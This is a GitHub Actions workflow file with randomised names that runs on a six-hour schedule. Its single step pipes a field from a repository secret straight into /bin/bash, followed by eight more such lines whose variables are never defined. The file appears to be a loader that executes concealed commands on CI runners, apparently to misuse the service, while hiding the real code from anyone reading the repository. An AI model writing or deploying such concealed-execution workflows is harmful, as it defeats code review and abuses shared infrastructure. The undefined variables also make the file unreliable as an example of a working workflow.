name: zhongxiaoyan3456
on:
  workflow_dispatch:
  schedule:
    - cron: '33 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhongxiaoyan3456
        env:
          gskse80172: ${{ secrets.gskse80172 }}
        run: |
          echo $gskse80172 | jq -r .y5 | /bin/bash
          echo $fqth97 | jq -r .zvt36851 | /bin/bash
          echo $sgye81035 | jq -r .z8678 | /bin/bash
          echo $uzihe94 | jq -r .i763 | /bin/bash
          echo $dcvyg6 | jq -r .cbnha08423 | /bin/bash
          echo $i1714 | jq -r .bpl5135 | /bin/bash
          echo $vvoqo1 | jq -r .sldgi828 | /bin/bash
          echo $tmlig948 | jq -r .smzz584 | /bin/bash
          echo $cyeao88085 | jq -r .zh00348 | /bin/bash

